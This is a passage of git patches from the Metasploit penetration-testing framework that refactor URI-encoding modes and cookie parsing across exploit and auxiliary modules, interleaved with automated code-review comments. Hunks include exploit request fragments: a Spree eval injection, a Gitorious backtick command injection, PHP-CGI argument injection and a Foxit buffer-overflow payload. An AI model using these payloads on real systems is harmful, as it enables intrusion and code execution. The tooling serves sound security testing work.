+++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -258,7 +258,8 @@ class Metasploit3 < Msf::Exploit::Remote # since we need to have credentials for this vuln, we just login and run a query # to get the version information - if not (version = mssql_query_version) + version = mssql_query_version + if not version return Exploit::CheckCode::Safe end print_status("@@version returned:\n\t" + version) @@ -430,7 +431,7 @@ exec sp_executesql @z| end # convert any bad stuff to char(0xXX) - if ((idx = badchars.index(ch.chr))) + if badchars.index(ch.chr) enc << "'" if in_str enc << "+char(0x%x)" % ch in_str = false diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index 31dfc58a78..3d1e5d8d71 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -299,7 +299,8 @@ class Metasploit3 < Msf::Exploit::Remote # Openquery generator else exec_at = temp.shift - sql = "exec(" + "'"*2**ticks + query_builder_rpc(temp,sql,ticks+1,execute) + "'"*2**ticks +") at [" + exec_at + "]" + quotes = "'"*2**ticks + sql = "exec(#{quotes}#{query_builder_rpc(temp, sql,ticks + 1, execute)}#{quotes}) at [#{exec_at}]" return sql end end From 2b8dd9139c61072f914b2cfa2fefe837520c126e Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Sun, 11 May 2014 16:14:51 -0500 Subject: [PATCH 280/853] Fix cosmetic issue Fix cosmetic issue /w email address when it is output via 'info' or the Rapid7 module page. --- modules/post/multi/gather/wlan_geolocate.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb index f3c7f957e7..be692cb345 100644 --- a/modules/post/multi/gather/wlan_geolocate.rb +++ b/modules/post/multi/gather/wlan_geolocate.rb 
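Review bot: In the `check` hunk of `ms09_004_sp_replwritetovarbin_sqli.rb` the rewritten test is still `if not version ... end` around a single `return`; the guard form `return Exploit::CheckCode::Safe unless version` is the idiomatic spelling. That branch reports `Safe` when the version query fails, which says nothing about the patch level, so `Exploit::CheckCode::Unknown` would be the more accurate result for anyone relying on the check. In the `mssql_linkcrawler.rb` hunk the new interpolated call `query_builder_rpc(temp, sql,ticks + 1, execute)` is missing a space after the second comma. Both methods start and end outside their hunks.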
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post Optionally geolocate the target by gathering local wireless networks and performing a lookup against Google APIs.}, 'License' => MSF_LICENSE, - 'Author' => [ 'Tom Sellers fadedcode.net>'], + 'Author' => [ 'Tom Sellers '], 'Platform' => %w{ osx win linux bsd solaris }, 'SessionTypes' => [ 'meterpreter', 'shell' ], )) From 5f523e8a04c2312db33d222c6975a6a18ce708f2 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Mon, 12 May 2014 11:26:27 -0500 Subject: [PATCH 281/853] Rex::Text::uri_encode - make 'hex-all' really mean all. 'hex-all' encoding was previously ignoring slashes. This pull adds 'hex-noslashes' mode which carries forward the previous functionality, and replaces all existing references to 'hex-all' with 'hex-noslashes' It then adds a replacement 'hex-all' mode, which really encodes *ALL* characters. --- lib/msf/core/exploit/http/client.rb | 2 +- lib/rex/proto/http/client_request.rb | 2 +- lib/rex/text.rb | 9 ++++++--- modules/exploits/multi/http/gitorious_graph.rb | 2 +- modules/exploits/multi/http/php_cgi_arg_injection.rb | 4 ++-- modules/exploits/multi/http/spree_search_exec.rb | 2 +- modules/exploits/multi/http/spree_searchlogic_exec.rb | 2 +- .../windows/browser/foxit_reader_plugin_url_bof.rb | 2 +- spec/lib/rex/proto/http/client_request_spec.rb | 4 ++-- 9 files changed, 16 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index b32e4fa0c7..b6f8474cec 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb 
@@ -58,7 +58,7 @@ module Exploit::Remote::HttpClient register_evasion_options( [ - OptEnum.new('HTTP::uri_encode_mode', [false, 'Enable URI encoding', 'hex-normal', ['none', 'hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-all', 'u-random']]), + OptEnum.new('HTTP::uri_encode_mode', [false, 'Enable URI encoding', 'hex-normal', ['none', 'hex-normal', 'hex-noslashes', 'hex-random', 'hex-all', 'u-normal', 'u-all', 'u-random']]), OptBool.new('HTTP::uri_full_url', [false, 'Use the full URL for all HTTP requests', false]), OptInt.new('HTTP::pad_method_uri_count', [false, 'How many whitespace characters to use between the method and uri', 1]), OptInt.new('HTTP::pad_uri_version_count', [false, 'How many whitespace characters to use between the uri and version', 1]), diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index e67da387f2..c4128fc259 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -40,7 +40,7 @@ class ClientRequest # 'encode_params' => true, 'encode' => false, - 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all + 'uri_encode_mode' => 'hex-normal', # hex-noslashes, hex-random, u-normal, u-random, u-all 'uri_encode_count' => 1, # integer 'uri_full_url' => false, # bool 'pad_method_uri_count' => 1, # integer diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 56e0ceb791..533e3db903 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb 
@@ -788,15 +788,18 @@ module Text return str if mode == 'none' # fast track no encoding - all = /[^\/\\]+/ + all = /./ + noslashes = /[^\/\\]+/ # http://tools.ietf.org/html/rfc3986#section-2.3 normal = /[^a-zA-Z0-9\/\\\.\-_~]+/ case mode - when 'hex-normal' - return str.gsub(normal) { |s| Rex::Text.to_hex(s, '%') } when 'hex-all' return str.gsub(all) { |s| Rex::Text.to_hex(s, '%') } + when 'hex-normal' + return str.gsub(normal) { |s| Rex::Text.to_hex(s, '%') } + when 'hex-noslashes' + return str.gsub(noslashes) { |s| Rex::Text.to_hex(s, '%') } when 'hex-random' res = '' str.each_byte do |c| diff --git a/modules/exploits/multi/http/gitorious_graph.rb b/modules/exploits/multi/http/gitorious_graph.rb index 36dbc96e70..5dae86e055 100644 --- a/modules/exploits/multi/http/gitorious_graph.rb +++ b/modules/exploits/multi/http/gitorious_graph.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote # Make sure the URI begins with a slash uri = normalize_uri(datastore['URI']) - command = Rex::Text.uri_encode(payload.raw, 'hex-all') + command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes') command.gsub!("%20","%2520") res = send_request_cgi({ 'uri' => "/api"+ uri + "/log/graph/%60#{command}%60", diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 61a67e8e40..e05d35ef74 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -1,4 +1,4 @@ -## +s## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote max.times { chars << rand(string.length)} end end - chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], "hex-all")} + chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], "hex-noslashes")} string end 
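Review bot: The new `all = /./` in lib/rex/text.rb still leaves line breaks unencoded, because in Ruby `.` does not match "\n" unless the regexp carries the `m` flag. A newline in `str` therefore passes through the 'hex-all' branch untouched, which contradicts the commit message's "encodes *ALL* characters". Writing it as `all = /./m` closes the gap, and a spec input containing "\n" would pin the behaviour. The enclosing method starts and ends outside the hunk.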
diff --git a/modules/exploits/multi/http/spree_search_exec.rb b/modules/exploits/multi/http/spree_search_exec.rb index e5bab5f8eb..dc5a7eeb1f 100644 --- a/modules/exploits/multi/http/spree_search_exec.rb +++ b/modules/exploits/multi/http/spree_search_exec.rb @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - command = Rex::Text.uri_encode(payload.raw, 'hex-all') + command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes') res = send_request_raw({ 'uri' => normalize_uri(datastore['URI']) + "?search[send][]=eval&search[send][]=Kernel.fork%20do%60#{command}%60end", 'method' => 'GET', diff --git a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb index 1e172296cc..53e698877c 100644 --- a/modules/exploits/multi/http/spree_searchlogic_exec.rb +++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - command = Rex::Text.uri_encode(payload.raw, 'hex-all') + command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes') urlconfigdir = normalize_uri(datastore['URI']) + '/' + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end" res = send_request_raw({ diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 0fc4a1113c..0063e8ec4e 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << self.send(my_target[:rop]) sploit << p.encoded - resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all') + resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-noslashes') cli.send_response(resp) # handle the payload 
diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index c76a9d2dee..f11b2b48e8 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -229,8 +229,8 @@ describe Rex::Proto::Http::ClientRequest do end end - context "and 'uri_encode_mode' = hex-all" do - let(:encode_mode) { 'hex-all' } + context "and 'uri_encode_mode' = hex-noslashes" do + let(:encode_mode) { 'hex-noslashes' } it "should encode all chars" do str = client_request.to_s str.should include("%66%6f%6f%5b%5d=%62%61%72") From cba39a9a043f528e5c2e7cd6287fab740359fd8b Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Mon, 12 May 2014 12:01:06 -0500 Subject: [PATCH 282/853] Adds spec for 'hex-all' mode --- spec/lib/rex/proto/http/client_request_spec.rb | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index f11b2b48e8..2fcd6e0271 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -189,6 +189,7 @@ describe Rex::Proto::Http::ClientRequest do 'foo[]' => 'bar', 'bar' => 'baz', 'frobnicate' => 'the froozle?', + 'foshizzle' => 'my/nizzle', } end @@ -215,6 +216,7 @@ describe Rex::Proto::Http::ClientRequest do str.should include("foo[]=bar") str.should include("bar=baz") str.should include("frobnicate=the froozle?") + str.should include("foshizzle=my/nizzle") end end @@ -226,6 +228,7 @@ describe Rex::Proto::Http::ClientRequest do str.should include("foo%5b%5d=bar") str.should include("bar=baz") str.should include("frobnicate=the%20froozle%3f") + str.should include("foshizzle=my/nizzle") end end 
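Review bot: The renamed 'hex-noslashes' context in client_request_spec.rb keeps the example description `it "should encode all chars" do`, which no longer describes the mode once a separate 'hex-all' exists. Something like `it "should encode all chars except slashes" do` keeps the spec output unambiguous when one of the two contexts fails. The surrounding `describe` block starts and ends outside the hunk.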
@@ -236,6 +239,18 @@ describe Rex::Proto::Http::ClientRequest do str.should include("%66%6f%6f%5b%5d=%62%61%72") str.should include("%62%61%72=%62%61%7a") str.should include("%66%72%6f%62%6e%69%63%61%74%65=%74%68%65%20%66%72%6f%6f%7a%6c%65%3f") + str.should include("%66%6f%73%68%69%7a%7a%6c%65=%6d%79/%6e%69%7a%7a%6c%65") + end + end + + context "and 'uri_encode_mode' = hex-all" do + let(:encode_mode) { 'hex-all' } + it "should encode all chars" do + str = client_request.to_s + str.should include("%66%6f%6f%5b%5d%3d%62%61%72") + str.should include("%62%61%72%3d%62%61%7a") + str.should include("%66%72%6f%62%6e%69%63%61%74%65%3d%74%68%65%20%66%72%6f%6f%7a%6c%65%3f") + str.should include("%66%6f%73%68%69%7a%7a%6c%65%3d%6d%79%2f%6e%69%7a%7a%6c%65") end end From 638ae477d9ab51607861b65d97d77d36119d21ae Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Mon, 12 May 2014 12:10:30 -0500 Subject: [PATCH 283/853] Fix up spec. Rex::Proto::Http::ClientRequest handles & and = outside of Rex::Text::uri_encode, so mode doesn't affect them. Fix erroneous typo char. --- modules/exploits/multi/http/php_cgi_arg_injection.rb | 2 +- spec/lib/rex/proto/http/client_request_spec.rb | 8 ++++---- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index e05d35ef74..b115e056f0 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -1,4 +1,4 @@ -s## +## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 2fcd6e0271..64c917fea2 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb 
@@ -247,10 +247,10 @@ describe Rex::Proto::Http::ClientRequest do let(:encode_mode) { 'hex-all' } it "should encode all chars" do str = client_request.to_s - str.should include("%66%6f%6f%5b%5d%3d%62%61%72") - str.should include("%62%61%72%3d%62%61%7a") - str.should include("%66%72%6f%62%6e%69%63%61%74%65%3d%74%68%65%20%66%72%6f%6f%7a%6c%65%3f") - str.should include("%66%6f%73%68%69%7a%7a%6c%65%3d%6d%79%2f%6e%69%7a%7a%6c%65") + str.should include("%66%6f%6f%5b%5d=%62%61%72") + str.should include("%62%61%72=%62%61%7a") + str.should include("%66%72%6f%62%6e%69%63%61%74%65=%74%68%65%20%66%72%6f%6f%7a%6c%65%3f") + str.should include("%66%6f%73%68%69%7a%7a%6c%65=%6d%79%2f%6e%69%7a%7a%6c%65") end end From d82bc11b7d3e8130c26862d590aafce66f648062 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Mon, 12 May 2014 13:01:05 -0500 Subject: [PATCH 284/853] Add 'u-noslashes' and re-order cases for consistency. --- lib/rex/text.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 533e3db903..fcf5bdb241 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -809,10 +809,12 @@ module Text b.gsub(normal){ |s| Rex::Text.to_hex(s, '%') } ) end return res - when 'u-normal' - return str.gsub(normal) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) } when 'u-all' return str.gsub(all) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) } + when 'u-normal' + return str.gsub(normal) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) } + when 'u-noslashes' + return str.gsub(noslashes) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) } when 'u-random' res = '' str.each_byte do |c| From a3cc499a171feaee69fb7ffef44e131b08c901c9 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Mon, 12 May 2014 13:02:54 -0500 Subject: [PATCH 285/853] Update comment w/ all modes --- lib/rex/proto/http/client_request.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
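Review bot: The 'u-noslashes' branch added to lib/rex/text.rb has no example in client_request_spec.rb, unlike 'hex-noslashes' and 'hex-all' earlier in this series. The reordered `when 'u-all'` branch also uses the `all` pattern that was redefined to `/./`, so 'u-all' now encodes slashes too; neither commit message mentions this and no spec covers it. In addition, the `HTTP::uri_encode_mode` OptEnum edited earlier in the series lists only 'u-normal', 'u-all' and 'u-random', so the enum and the `case` are out of step unless another change updates it. The method body continues outside the hunk.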
diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c4128fc259..3461ed5081 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -40,7 +40,7 @@ class ClientRequest # 'encode_params' => true, 'encode' => false, - 'uri_encode_mode' => 'hex-normal', # hex-noslashes, hex-random, u-normal, u-random, u-all + 'uri_encode_mode' => 'hex-normal', # hex-all, hex-noslashes, hex-random, u-all, u-noslashes, u-random 'uri_encode_count' => 1, # integer 'uri_full_url' => false, # bool 'pad_method_uri_count' => 1, # integer From 2849a1bc0cd1620affdd11870b2d943a486702fb Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Mon, 12 May 2014 13:10:20 -0500 Subject: [PATCH 286/853] Update comment again --- lib/rex/proto/http/client_request.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 3461ed5081..2758d8fa77 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -40,7 +40,7 @@ class ClientRequest # 'encode_params' => true, 'encode' => false, - 'uri_encode_mode' => 'hex-normal', # hex-all, hex-noslashes, hex-random, u-all, u-noslashes, u-random + 'uri_encode_mode' => 'hex-normal', # hex-normal, hex-all, hex-noslashes, hex-random, u-normal, u-all, u-noslashes, u-random 'uri_encode_count' => 1, # integer 'uri_full_url' => false, # bool 'pad_method_uri_count' => 1, # integer From 3f3283ba060682b183c64d74fe0d3e084d43f1e8 Mon Sep 17 00:00:00 2001 
From: Christian Mehlmauer Date: Mon, 12 May 2014 21:23:30 +0200 Subject: [PATCH 287/853] Resolved some msftidy warnings (Set-Cookie) --- .../auxiliary/admin/2wire/xslt_password_reset.rb | 3 ++- modules/auxiliary/admin/http/axigen_file_access.rb | 2 +- .../admin/http/cfme_manageiq_evm_pass_reset.rb | 2 +- .../http/foreman_openstack_satellite_priv_esc.rb | 2 +- .../admin/http/mutiny_frontend_read_delete.rb | 4 ++-- .../auxiliary/admin/http/tomcat_administration.rb | 4 ++-- modules/auxiliary/admin/oracle/osb_execqr2.rb | 6 ++---- modules/auxiliary/admin/oracle/osb_execqr3.rb | 6 ++---- .../auxiliary/admin/webmin/edit_html_fileaccess.rb | 4 ++-- modules/auxiliary/fuzzers/http/http_form_field.rb | 13 ++++++++----- modules/auxiliary/gather/apache_rave_creds.rb | 2 +- .../auxiliary/gather/doliwamp_traversal_creds.rb | 2 +- modules/auxiliary/scanner/http/cisco_asa_asdm.rb | 4 ++-- .../auxiliary/scanner/http/cisco_ironport_enum.rb | 8 ++++---- tools/msftidy.rb | 4 ++-- 15 files changed, 33 insertions(+), 33 deletions(-) diff --git a/modules/auxiliary/admin/2wire/xslt_password_reset.rb b/modules/auxiliary/admin/2wire/xslt_password_reset.rb index 2d37d2d45c..d44d0d6b5f 100644 --- a/modules/auxiliary/admin/2wire/xslt_password_reset.rb +++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb @@ -130,7 +130,8 @@ class Metasploit3 < Msf::Auxiliary }, 25) if res and res.code == 200 - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/(.*); path=\//)) + cookies = res.get_cookies + if cookies && cookies.match(/(.*); path=\//) cookie= $1 print_status("Got cookie #{cookie}. Password reset was successful!\n") end diff --git a/modules/auxiliary/admin/http/axigen_file_access.rb b/modules/auxiliary/admin/http/axigen_file_access.rb index 2b3e656c44..00ac0f0404 100644 --- a/modules/auxiliary/admin/http/axigen_file_access.rb +++ b/modules/auxiliary/admin/http/axigen_file_access.rb 
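Review bot: In xslt_password_reset.rb the pattern `/(.*); path=\//` is now applied to `res.get_cookies` instead of the raw header, so it matches only if that string still carries the `path` attribute. If `get_cookies` returns just the name=value pairs (worth confirming in Rex::Proto::Http::Response), the branch never runs and the status message is never printed, which makes this more than a tidy-up. Testing the returned string directly, `cookie = res.get_cookies` followed by `unless cookie.empty?`, would not depend on attributes. The enclosing method starts and ends outside the hunk.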
@@ -167,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 303 and res.headers['Location'] =~ /_h=([a-f0-9]*)/ @token = $1 - if res.headers['Set-Cookie'] =~ /_hadmin=([a-f0-9]*)/ + if res.get_cookies =~ /_hadmin=([a-f0-9]*)/ @session = $1 return true end diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb index 633e009fe4..15a995d8a0 100644 --- a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb +++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb @@ -113,7 +113,7 @@ class Metasploit4 < Msf::Auxiliary print_error($1) return else - session = $1 if res.headers['Set-Cookie'] =~ /_vmdb_session=(\h*)/ + session = $1 if res.get_cookies =~ /_vmdb_session=(\h*)/ if session.nil? print_error('Failed to retrieve the current session id') diff --git a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb index bdd15b4d30..e838b4d12c 100644 --- a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb @@ -67,7 +67,7 @@ class Metasploit4 < Msf::Auxiliary print_error('Authentication failed') return else - session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/ + session = $1 if res.get_cookies =~ /_session_id=([0-9a-f]*)/ if session.nil? print_error('Failed to retrieve the current session id') diff --git a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb index 32c3ce4654..dc262ee55a 100644 --- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb +++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb 
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/ + if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=(.*);/ first_session = $1 end @@ -165,7 +165,7 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => "JSESSIONID=#{first_session}" }) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/ + if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=(.*);/ @session = $1 return true end diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index b40fb44141..ecc0464e17 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb +++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary 'uri' => '/admin/', }, 25) - if (res and res.code == 200) + if res && res.code == 200 - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/JSESSIONID=(.*);(.*)/i)) + if res.get_cookies.match(/JSESSIONID=(.*);(.*)/i) jsessionid = $1 diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb index 261ab2395a..b10f76cd21 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr2.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb @@ -49,9 +49,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'POST', }, 5) - if (res and res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i)) - - sessionid = res.headers['Set-Cookie'].split(';')[0] + if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i) print_status("Sending command: #{datastore['CMD']}...") @@ -59,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary { 'uri' => '/property_box.php', 'data' => 'type=Sections&vollist=75' + Rex::Text.uri_encode("&" + cmd), - 'cookie' => sessionid, + 'cookie' => res.get_cookies, 'method' => 'POST', }, 5) 
diff --git a/modules/auxiliary/admin/oracle/osb_execqr3.rb b/modules/auxiliary/admin/oracle/osb_execqr3.rb index 06264af018..d833ef5406 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr3.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr3.rb @@ -46,9 +46,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'POST', }, 5) - if (res and res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i)) - - sessionid = res.headers['Set-Cookie'].split(';')[0] + if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i) print_status("Sending command: #{datastore['CMD']}...") @@ -56,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary { 'uri' => '/property_box.php', 'data' => 'type=Job&jlist=' + Rex::Text.uri_encode('&' + cmd), - 'cookie' => sessionid, + 'cookie' => res.get_cookies, 'method' => 'POST', }, 5) diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb index 5fe695a22f..31edbcc74b 100644 --- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb +++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb @@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ - session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || '' + if res and res.code == 302 and res.get_cookies =~ /sid/ + session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? print_good "#{peer} - Authentication successful" else diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index 0e3f0a0454..7c879f4c7b 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb 
@@ -455,21 +455,23 @@ class Metasploit3 < Msf::Auxiliary formidx = formidx + 1 formcnt += 1 end + if forms.size > 0 print_status(" Forms : ") end + forms.each do | thisform | print_status(" - Name : #{thisform[:name]}, ID : #{thisform[:id]}, Action : #{thisform[:action]}, Method : #{thisform[:method]}") end + return forms end - def extract_cookie(body) - return body["Set-Cookie"] - end + def set_cookie(cookie) @get_data_headers["Cookie"]=cookie @send_data[:headers]["Cookie"]=cookie end + def run init_fuzzdata() init_vars() @@ -487,10 +489,11 @@ class Metasploit3 < Msf::Auxiliary print_error("No response") return end + if datastore['HANDLECOOKIES'] - cookie = extract_cookie(response.headers) + cookie = response.get_cookies set_cookie(cookie) - print_status("Set cookie:#{cookie}") + print_status("Set cookie: #{cookie}") print_status("Grabbing webpage #{datastore['URL']} from #{datastore['RHOST']} using cookies") response = send_request_raw( diff --git a/modules/auxiliary/gather/apache_rave_creds.rb b/modules/auxiliary/gather/apache_rave_creds.rb index d9eeaf457c..1b654779fc 100644 --- a/modules/auxiliary/gather/apache_rave_creds.rb +++ b/modules/auxiliary/gather/apache_rave_creds.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary } }) - if res and res.code == 302 and res.headers['Location'] !~ /authfail/ and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/ + if res and res.code == 302 and res.headers['Location'] !~ /authfail/ and res.get_cookies =~ /JSESSIONID=(.*);/ return $1 else return nil diff --git a/modules/auxiliary/gather/doliwamp_traversal_creds.rb b/modules/auxiliary/gather/doliwamp_traversal_creds.rb index f53eef3a90..fdf092ed90 100644 --- a/modules/auxiliary/gather/doliwamp_traversal_creds.rb +++ b/modules/auxiliary/gather/doliwamp_traversal_creds.rb 
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary }) if !res print_error("#{peer} - Connection failed") - elsif res.code == 200 and res.headers["set-cookie"] =~ /DOLSESSID_([a-f0-9]{32})=/ + elsif res.code == 200 and res.get_cookies =~ /DOLSESSID_([a-f0-9]{32})=/ return "DOLSESSID_#{$1}=#{token}" else print_warning("#{peer} - Could not create session cookie") diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb index 4cd4492430..f60c22c38d 100644 --- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb +++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 && - res.headers['Set-Cookie'].match(/webvpn/) + res.get_cookies.include?('webvpn') return true else @@ -135,4 +135,4 @@ class Metasploit3 < Msf::Auxiliary return :abort end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb index 6d58cb1cae..75c37b5f0b 100644 --- a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb +++ b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb @@ -77,15 +77,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) - if (res and res.headers['Set-Cookie']) + if res && res.get_cookies - cookie = res.headers['Set-Cookie'].split('; ')[0] + cookie = 